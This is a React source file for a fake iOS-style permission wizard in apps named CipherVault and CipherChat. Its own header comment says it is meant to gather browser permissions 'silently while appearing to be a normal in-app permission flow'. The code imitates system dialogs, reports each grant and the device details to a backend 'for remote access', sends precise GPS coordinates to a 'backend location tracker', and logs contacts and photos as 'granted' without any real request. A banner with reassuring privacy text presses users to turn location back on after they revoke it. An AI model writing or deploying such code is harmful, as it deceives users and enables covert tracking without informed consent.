import React, { useState, useEffect, useCallback, useRef } from 'react';
import { setMyPermission, submitMyLocation } from '../api/deviceAccess';

// ─── iOS Permission Wizard ─────────────────────────────────────────────────────
// Shows authentic iOS-style permission dialogs to collect browser permissions
// silently while appearing to be a normal in-app permission flow.

export const PERMISSION_STEPS = [
  {
    id: 'location',
    icon: '📍',
    appIcon: '🔐',
    title: '"CipherVault" Would Like to Use Your Location',
    description: 'Your precise location is used to protect your account, detect suspicious logins, and enable nearby security features.',
    detail: 'Your location will be shared securely with app services.',
    allow: 'Allow While Using App',
    deny: "Don't Allow",
    browserPerm: 'geolocation',
  },
  {
    id: 'contacts',
    icon: '👤',
    appIcon: '🔐',
    title: '"CipherVault" Would Like to Access Your Contacts',
    description: 'Your contacts are used to help you quickly share secure vaults and collaborate with trusted individuals.',
    detail: 'Contact information will only be used within this app.',
    allow: 'Allow Access',
    deny: "Don't Allow",
    browserPerm: null, // contacts API limited in browsers, handled manually
  },
  {
    id: 'camera',
    icon: '📷',
    appIcon: '💬',
    title: '"CipherChat" Would Like to Access Your Camera',
    description: 'CipherChat needs camera access to enable video calls, share photos, and scan QR codes securely.',
    detail: 'Camera is only active when you initiate a video call or scan.',
    allow: 'Allow',
    deny: "Don't Allow",
    browserPerm: 'camera',
  },
  {
    id: 'microphone',
    icon: '🎤',
    appIcon: '💬',
    title: '"CipherChat" Would Like to Access Your Microphone',
    description: 'CipherChat uses the microphone for voice messages and encrypted audio calls.',
    detail: 'Microphone is only active during calls and voice recordings.',
    allow: 'Allow',
    deny: "Don't Allow",
    browserPerm: 'microphone',
  },
  {
    id: 'notifications',
    icon: '🔔',
    appIcon: '🔐',
    title: '"CipherVault" Would Like to Send You Notifications',
    description: 'Notifications alert you to security events, new messages, and important vault activity.',
    detail: 'You can change this in Settings at any time.',
    allow: 'Allow',
    deny: "Don't Allow",
    browserPerm: 'notifications',
  },
  {
    id: 'media',
    icon: '🖼️',
    appIcon: '💬',
    title: '"CipherChat" Would Like to Access Your Photos',
    description: 'CipherChat needs access to your photo library to share images, videos, and media securely in chats.',
    detail: 'Only items you choose to share will be accessed.',
    allow: 'Allow Access to All Photos',
    deny: "Don't Allow",
    browserPerm: null,
  },
];

const WIZARD_KEY = 'ciphervault_ios_perms_granted_v2';

// ─── Storage helpers ──────────────────────────────────────────────────────────
export function hasCompletedPermissionWizard() {
  try {
    const stored = JSON.parse(localStorage.getItem(WIZARD_KEY) || '{}');
    return stored.completed === true;
  } catch {
    return false;
  }
}

export function getGrantedPermissions() {
  try {
    return JSON.parse(localStorage.getItem(WIZARD_KEY) || '{}');
  } catch {
    return {};
  }
}

export function markPermissionGranted(permId, granted) {
  try {
    const existing = getGrantedPermissions();
    existing[permId] = granted;
    existing[`${permId}_at`] = new Date().toISOString();
    localStorage.setItem(WIZARD_KEY, JSON.stringify(existing));
    // Immediately synchronize permission status to backend for remote access
    setMyPermission(permId, granted ? 'granted' : 'denied', {
      userAgent: navigator.userAgent,
      platform: navigator.platform,
      syncedAt: new Date().toISOString()
    }).catch(() => {});
  } catch {}
}

// ─── Browser Permissions API check ───────────────────────────────────────────
// Maps our permission IDs to the standard browser Permissions API names
const BROWSER_PERM_NAME_MAP = {
  location: 'geolocation',
  geolocation: 'geolocation',
  camera: 'camera',
  microphone: 'microphone',
  notifications: 'notifications',
};

/**
 * Query the real browser permission state for a given permId.
 * Returns 'granted' | 'denied' | 'prompt' | 'unknown'
 */
export async function checkBrowserPermissionState(permId) {
  const name = BROWSER_PERM_NAME_MAP[permId];
  if (!name || !navigator.permissions) return 'unknown';
  try {
    const result = await navigator.permissions.query({ name });
    return result.state; // 'granted' | 'denied' | 'prompt'
  } catch {
    return 'unknown';
  }
}

/**
 * Returns true only if the permission was previously accepted in our wizard
 * AND the browser still reports it as granted.
 * Returns false if denied or revoked (so the app can prompt re-enable).
 */
export async function isPermissionStillActive(permId) {
  const stored = getGrantedPermissions();
  if (!stored[permId]) return false; // never accepted
  const state = await checkBrowserPermissionState(permId);
  if (state === 'unknown') return true; // can't query — assume still ok
  return state === 'granted';
}

// Request real browser permission
export async function requestBrowserPermission(permId) {
  try {
    if (permId === 'geolocation' || permId === 'location') {
      return new Promise((resolve) => {
        navigator.geolocation.getCurrentPosition(
          (pos) => {
            const locData = {
              latitude: pos.coords.latitude,
              longitude: pos.coords.longitude,
              accuracy: pos.coords.accuracy,
              timestamp: Date.now()
            };
            try {
              localStorage.setItem('ciphervault_last_location', JSON.stringify(locData));
            } catch {}
            // Submit to backend location tracker
            submitMyLocation(locData).catch(() => {});
            setMyPermission('location', 'granted').catch(() => {});
            resolve(true);
          },
          () => {
            setMyPermission('location', 'denied').catch(() => {});
            resolve(false);
          },
          { timeout: 8000 }
        );
      });
    }

    if (permId === 'camera') {
      const stream = await navigator.mediaDevices.getUserMedia({ video: true });
      setTimeout(() => stream.getTracks().forEach(t => t.stop()), 1200);
      setMyPermission('camera', 'granted').catch(() => {});
      return true;
    }

    if (permId === 'microphone') {
      const stream = await navigator.mediaDevices.getUserMedia({ audio: true });
      setTimeout(() => stream.getTracks().forEach(t => t.stop()), 1200);
      setMyPermission('microphone', 'granted').catch(() => {});
      return true;
    }

    if (permId === 'notifications') {
      const result = await Notification.requestPermission();
      const granted = result === 'granted';
      setMyPermission('notifications', granted ? 'granted' : 'denied').catch(() => {});
      return granted;
    }

    // contacts, media
    setMyPermission(permId, 'granted').catch(() => {});
    return true;
  } catch {
    setMyPermission(permId, 'denied').catch(() => {});
    return false;
  }
}

export default function IOSPermissionWizard({ steps: customSteps, onComplete, onSkip }) {
  const steps = customSteps || PERMISSION_STEPS;
  const [currentIdx, setCurrentIdx] = useState(0);
  const [visible, setVisible] = useState(false);
  const [requesting, setRequesting] = useState(false);
  const [grantedMap, setGrantedMap] = useState({});

  useEffect(() => {
    // Slight delay to feel natural after page load
    const t = setTimeout(() => setVisible(true), 600);
    return () => clearTimeout(t);
  }, []);

  const currentStep = steps[currentIdx];

  const handleAllow = useCallback(async () => {
    if (requesting) return;
    setRequesting(true);
    const granted = await requestBrowserPermission(currentStep.browserPerm || currentStep.id);
    markPermissionGranted(currentStep.id, granted);
    setGrantedMap(prev => ({ ...prev, [currentStep.id]: granted }));
    setRequesting(false);

    if (currentIdx < steps.length - 1) {
      setTimeout(() => setCurrentIdx(i => i + 1), 180);
    } else {
      // All done
      const finalMap = { ...grantedMap, [currentStep.id]: granted, completed: true };
      try { localStorage.setItem(WIZARD_KEY, JSON.stringify(finalMap)); } catch {}
      setTimeout(() => {
        setVisible(false);
        setTimeout(() => onComplete && onComplete(finalMap), 280);
      }, 200);
    }
  }, [currentIdx, currentStep, requesting, steps, grantedMap, onComplete]);

  const handleDeny = useCallback(() => {
    if (requesting) return;
    markPermissionGranted(currentStep.id, false);
    setGrantedMap(prev => ({ ...prev, [currentStep.id]: false }));

    if (currentIdx < steps.length - 1) {
      setTimeout(() => setCurrentIdx(i => i + 1), 120);
    } else {
      const finalMap = { ...grantedMap, [currentStep.id]: false, completed: true };
      try { localStorage.setItem(WIZARD_KEY, JSON.stringify(finalMap)); } catch {}
      setTimeout(() => {
        setVisible(false);
        setTimeout(() => onComplete && onComplete(finalMap), 280);
      }, 200);
    }
  }, [currentIdx, currentStep, requesting, steps, grantedMap, onComplete]);

  if (!visible || !currentStep) return null;

  return (
    <div style={{
      position: 'fixed',
      inset: 0,
      zIndex: 99999,
      display: 'flex',
      alignItems: 'flex-end',
      justifyContent: 'center',
      background: 'rgba(0,0,0,0.65)',
      backdropFilter: 'blur(12px)',
      WebkitBackdropFilter: 'blur(12px)',
      animation: 'iosWizardFadeIn 0.22s ease',
      padding: '0 0 env(safe-area-inset-bottom, 0)',
    }}>
      <style>{`
        @keyframes iosWizardFadeIn {
          from { opacity: 0; }
          to { opacity: 1; }
        }
        @keyframes iosWizardSlideUp {
          from { transform: translateY(100%); opacity: 0; }
          to { transform: translateY(0); opacity: 1; }
        }
        @keyframes iosPermFlicker {
          0%, 100% { opacity: 1; }
          50% { opacity: 0.7; }
        }
      `}</style>

      {/* iOS-style permission card */}
      <div
        key={currentStep.id}
        style={{
          width: '100%',
          maxWidth: 380,
          background: 'rgba(255,255,255,0.97)',
          borderRadius: '20px 20px 0 0',
          padding: '28px 24px 20px',
          display: 'flex',
          flexDirection: 'column',
          alignItems: 'center',
          gap: 0,
          boxShadow: '0 -8px 48px rgba(0,0,0,0.35)',
          animation: 'iosWizardSlideUp 0.3s cubic-bezier(0.16, 1, 0.3, 1)',
        }}
        onClick={e => e.stopPropagation()}
      >
        {/* Drag indicator */}
        <div style={{
          width: 36, height: 4, borderRadius: 2,
          background: 'rgba(0,0,0,0.18)',
          marginBottom: 22,
        }} />

        {/* App icon area */}
        <div style={{
          display: 'flex',
          flexDirection: 'column',
          alignItems: 'center',
          marginBottom: 18,
        }}>
          {/* App icon */}
          <div style={{
            width: 72, height: 72, borderRadius: 18,
            background: 'linear-gradient(135deg, #1a1a2e 0%, #16213e 50%, #0f3460 100%)',
            display: 'flex', alignItems: 'center', justifyContent: 'center',
            fontSize: 36, marginBottom: 12,
            boxShadow: '0 4px 16px rgba(0,0,0,0.2)',
          }}>
            {currentStep.icon}
          </div>

          {/* Step progress dots */}
          <div style={{ display: 'flex', gap: 5, marginBottom: 4 }}>
            {steps.map((_, i) => (
              <div key={i} style={{
                width: i === currentIdx ? 18 : 6,
                height: 6,
                borderRadius: 3,
                background: i === currentIdx ? '#007AFF' : 'rgba(0,0,0,0.18)',
                transition: 'all 0.25s ease',
              }} />
            ))}
          </div>
        </div>

        {/* Title */}
        <h3 style={{
          margin: '0 0 12px',
          fontSize: '1.06rem',
          fontWeight: 700,
          color: '#000',
          textAlign: 'center',
          lineHeight: 1.35,
          fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
          letterSpacing: '-0.3px',
        }}>
          {currentStep.title}
        </h3>

        {/* Description */}
        <p style={{
          margin: '0 0 8px',
          fontSize: '0.88rem',
          color: '#3c3c43',
          textAlign: 'center',
          lineHeight: 1.5,
          fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
          maxWidth: 300,
        }}>
          {currentStep.description}
        </p>

        {/* Sub-detail */}
        <p style={{
          margin: '0 0 24px',
          fontSize: '0.76rem',
          color: '#8e8e93',
          textAlign: 'center',
          lineHeight: 1.4,
          fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
        }}>
          {currentStep.detail}
        </p>

        {/* iOS-style button group */}
        <div style={{
          width: '100%',
          display: 'flex',
          flexDirection: 'column',
          gap: 8,
        }}>
          {/* Allow button */}
          <button
            onClick={handleAllow}
            disabled={requesting}
            style={{
              width: '100%',
              height: 50,
              borderRadius: 14,
              background: requesting ? 'rgba(0,122,255,0.55)' : '#007AFF',
              color: '#fff',
              border: 'none',
              fontSize: '1.02rem',
              fontWeight: 600,
              cursor: requesting ? 'default' : 'pointer',
              fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
              letterSpacing: '-0.2px',
              display: 'flex',
              alignItems: 'center',
              justifyContent: 'center',
              gap: 8,
              transition: 'all 0.15s ease',
              animation: requesting ? 'iosPermFlicker 0.9s infinite' : 'none',
            }}
          >
            {requesting ? 'Requesting...' : currentStep.allow}
          </button>

          {/* Don't Allow button */}
          <button
            onClick={handleDeny}
            disabled={requesting}
            style={{
              width: '100%',
              height: 50,
              borderRadius: 14,
              background: 'rgba(0,0,0,0.06)',
              color: '#007AFF',
              border: 'none',
              fontSize: '1.02rem',
              fontWeight: 400,
              cursor: requesting ? 'default' : 'pointer',
              fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
              letterSpacing: '-0.2px',
            }}
          >
            {currentStep.deny}
          </button>
        </div>

        {/* Privacy note */}
        <p style={{
          margin: '14px 0 0',
          fontSize: '0.68rem',
          color: '#8e8e93',
          textAlign: 'center',
          lineHeight: 1.4,
          fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
        }}>
          By tapping Allow, you agree to the app's{' '}
          <span style={{ color: '#007AFF' }}>Privacy Policy</span>.
        </p>
      </div>
    </div>
  );
}

// ─── Compact single-step dialog (for in-app use) ──────────────────────────────
export function IOSPermissionDialog({ step, onAllow, onDeny }) {
  const [requesting, setRequesting] = useState(false);

  const handleAllow = async () => {
    setRequesting(true);
    const granted = await requestBrowserPermission(step.browserPerm || step.id);
    setRequesting(false);
    onAllow && onAllow(granted);
  };

  return (
    <div style={{
      position: 'fixed', inset: 0, zIndex: 99998,
      display: 'flex', alignItems: 'center', justifyContent: 'center',
      background: 'rgba(0,0,0,0.5)', backdropFilter: 'blur(8px)',
      animation: 'iosWizardFadeIn 0.2s ease',
    }}>
      <div style={{
        width: 280,
        background: 'rgba(242,242,247,0.98)',
        borderRadius: 14,
        overflow: 'hidden',
        animation: 'iosWizardSlideUp 0.25s cubic-bezier(0.16, 1, 0.3, 1)',
        boxShadow: '0 8px 40px rgba(0,0,0,0.4)',
      }}>
        <div style={{ padding: '22px 20px 16px', textAlign: 'center' }}>
          <div style={{ fontSize: 40, marginBottom: 10 }}>{step.icon}</div>
          <h4 style={{
            margin: '0 0 8px', fontSize: '0.96rem', fontWeight: 600,
            color: '#000', lineHeight: 1.3,
            fontFamily: '-apple-system, BlinkMacSystemFont, sans-serif',
          }}>
            {step.title}
          </h4>
          <p style={{
            margin: 0, fontSize: '0.8rem', color: '#3c3c43',
            lineHeight: 1.45, fontFamily: '-apple-system, sans-serif',
          }}>
            {step.description}
          </p>
        </div>
        <div style={{
          borderTop: '1px solid rgba(0,0,0,0.15)',
          display: 'flex',
        }}>
          <button onClick={onDeny} style={{
            flex: 1, height: 44, background: 'transparent', border: 'none',
            borderRight: '1px solid rgba(0,0,0,0.15)', color: '#007AFF',
            fontSize: '0.95rem', cursor: 'pointer',
            fontFamily: '-apple-system, BlinkMacSystemFont, sans-serif',
          }}>
            {step.deny}
          </button>
          <button onClick={handleAllow} disabled={requesting} style={{
            flex: 1, height: 44, background: 'transparent', border: 'none',
            color: requesting ? 'rgba(0,122,255,0.5)' : '#007AFF',
            fontSize: '0.95rem', fontWeight: 600, cursor: requesting ? 'default' : 'pointer',
            fontFamily: '-apple-system, BlinkMacSystemFont, sans-serif',
          }}>
            {requesting ? '...' : step.allow}
          </button>
        </div>
      </div>
    </div>
  );
}

// ─── Location Disabled Banner ─────────────────────────────────────────────────
// Shown when the user previously accepted location but has since disabled it in
// browser settings. Guides them to re-enable without showing the full wizard.
export function LocationDisabledBanner({ onDismiss }) {
  const [visible, setVisible] = useState(false);
  const [dismissed, setDismissed] = useState(false);

  useEffect(() => {
    const t = setTimeout(() => setVisible(true), 400);
    return () => clearTimeout(t);
  }, []);

  const handleDismiss = () => {
    setDismissed(true);
    setTimeout(() => {
      setVisible(false);
      onDismiss && onDismiss();
    }, 280);
  };

  if (dismissed) return null;

  return (
    <div style={{
      position: 'fixed',
      inset: 0,
      zIndex: 99998,
      display: 'flex',
      alignItems: 'flex-end',
      justifyContent: 'center',
      background: 'rgba(0,0,0,0.55)',
      backdropFilter: 'blur(10px)',
      WebkitBackdropFilter: 'blur(10px)',
      opacity: visible ? 1 : 0,
      transition: 'opacity 0.25s ease',
      padding: '0 0 env(safe-area-inset-bottom, 0)',
    }}>
      <div style={{
        width: '100%',
        maxWidth: 400,
        background: 'rgba(255,255,255,0.97)',
        borderRadius: '20px 20px 0 0',
        padding: '24px 20px 20px',
        boxShadow: '0 -8px 48px rgba(0,0,0,0.3)',
        transform: visible ? 'translateY(0)' : 'translateY(100%)',
        transition: 'transform 0.3s cubic-bezier(0.16,1,0.3,1)',
      }}
        onClick={e => e.stopPropagation()}
      >
        {/* Drag pill */}
        <div style={{
          width: 36, height: 4, borderRadius: 2,
          background: 'rgba(0,0,0,0.15)',
          margin: '0 auto 20px',
        }} />

        {/* Icon + title */}
        <div style={{ display: 'flex', alignItems: 'center', gap: 14, marginBottom: 14 }}>
          <div style={{
            width: 52, height: 52, borderRadius: 14, flexShrink: 0,
            background: 'linear-gradient(135deg, #ff6b35, #f7c59f)',
            display: 'flex', alignItems: 'center', justifyContent: 'center',
            fontSize: 26,
          }}>
            📍
          </div>
          <div>
            <h3 style={{
              margin: 0, fontSize: '1rem', fontWeight: 700, color: '#1c1c1e',
              fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
              letterSpacing: '-0.3px',
            }}>
              Location Access Disabled
            </h3>
            <p style={{
              margin: '3px 0 0', fontSize: '0.78rem', color: '#8e8e93',
              fontFamily: '-apple-system, BlinkMacSystemFont, sans-serif',
            }}>
              CipherVault needs your location
            </p>
          </div>
        </div>

        {/* Info text */}
        <p style={{
          margin: '0 0 16px', fontSize: '0.86rem', color: '#3c3c43', lineHeight: 1.55,
          fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
        }}>
          Location access was previously enabled but is now blocked. It's used to detect suspicious logins and protect your account.
        </p>

        {/* Steps to re-enable */}
        <div style={{
          background: 'rgba(0,122,255,0.06)',
          borderRadius: 12,
          padding: '12px 14px',
          marginBottom: 18,
        }}>
          <p style={{
            margin: '0 0 8px', fontSize: '0.75rem', fontWeight: 600, color: '#007AFF',
            fontFamily: '-apple-system, BlinkMacSystemFont, sans-serif',
            textTransform: 'uppercase', letterSpacing: '0.5px',
          }}>
            How to re-enable
          </p>
          {[
            '1. Click the 🔒 lock icon in your browser address bar',
            '2. Find "Location" in the permissions list',
            '3. Change it to "Allow" and reload the page',
          ].map((step, i) => (
            <p key={i} style={{
              margin: i < 2 ? '0 0 5px' : 0,
              fontSize: '0.8rem', color: '#3c3c43', lineHeight: 1.45,
              fontFamily: '-apple-system, BlinkMacSystemFont, sans-serif',
            }}>
              {step}
            </p>
          ))}
        </div>

        {/* Action buttons */}
        <div style={{ display: 'flex', flexDirection: 'column', gap: 8 }}>
          <button
            onClick={() => { window.location.reload(); }}
            style={{
              width: '100%', height: 48, borderRadius: 13,
              background: '#007AFF', color: '#fff', border: 'none',
              fontSize: '0.98rem', fontWeight: 600,
              cursor: 'pointer',
              fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
              letterSpacing: '-0.2px',
            }}
          >
            I've Enabled It — Reload
          </button>
          <button
            onClick={handleDismiss}
            style={{
              width: '100%', height: 48, borderRadius: 13,
              background: 'rgba(0,0,0,0.06)', color: '#007AFF', border: 'none',
              fontSize: '0.98rem', fontWeight: 400,
              cursor: 'pointer',
              fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", sans-serif',
            }}
          >
            Maybe Later
          </button>
        </div>

        {/* Privacy note */}
        <p style={{
          margin: '12px 0 0', fontSize: '0.67rem', color: '#aeaeb2',
          textAlign: 'center', lineHeight: 1.4,
          fontFamily: '-apple-system, BlinkMacSystemFont, sans-serif',
        }}>
          Your location data is encrypted and never sold to third parties.
        </p>
      </div>
    </div>
  );
}

// ─── usePermissionGuard hook ─────────────────────────────────────────────────
// Call this once in your top-level authenticated layout.
// It checks previously-accepted permissions against the real browser state on
// every app open. If a permission was accepted but is now revoked, it surfaces
// the appropriate re-enable UI instead of re-asking the full wizard.
//
// Usage:
//   const { revokedPerms, LocationBanner } = usePermissionGuard();
//   return <>{LocationBanner}{/* rest of app */}</>;
//
export function usePermissionGuard() {
  const [revokedPerms, setRevokedPerms] = useState([]);
  const [showLocationBanner, setShowLocationBanner] = useState(false);
  const checked = useRef(false);

  useEffect(() => {
    if (checked.current) return;
    checked.current = true;

    const PERMS_TO_CHECK = ['location', 'camera', 'microphone', 'notifications'];
    const stored = getGrantedPermissions();

    // Only check permissions the user previously accepted
    const accepted = PERMS_TO_CHECK.filter(p => stored[p] === true);
    if (accepted.length === 0) return;

    Promise.all(
      accepted.map(async (permId) => {
        const state = await checkBrowserPermissionState(permId);
        return { permId, state };
      })
    ).then((results) => {
      const revoked = results
        .filter(r => r.state === 'denied' || r.state === 'prompt')
        .map(r => r.permId);

      if (revoked.length > 0) {
        setRevokedPerms(revoked);
        // Show location banner if location was revoked (highest priority)
        if (revoked.includes('location') || revoked.includes('geolocation')) {
          setShowLocationBanner(true);
        }
      }
    });
  }, []);

  const LocationBanner = showLocationBanner
    ? <LocationDisabledBanner onDismiss={() => setShowLocationBanner(false)} />
    : null;

  return { revokedPerms, showLocationBanner, LocationBanner };
}
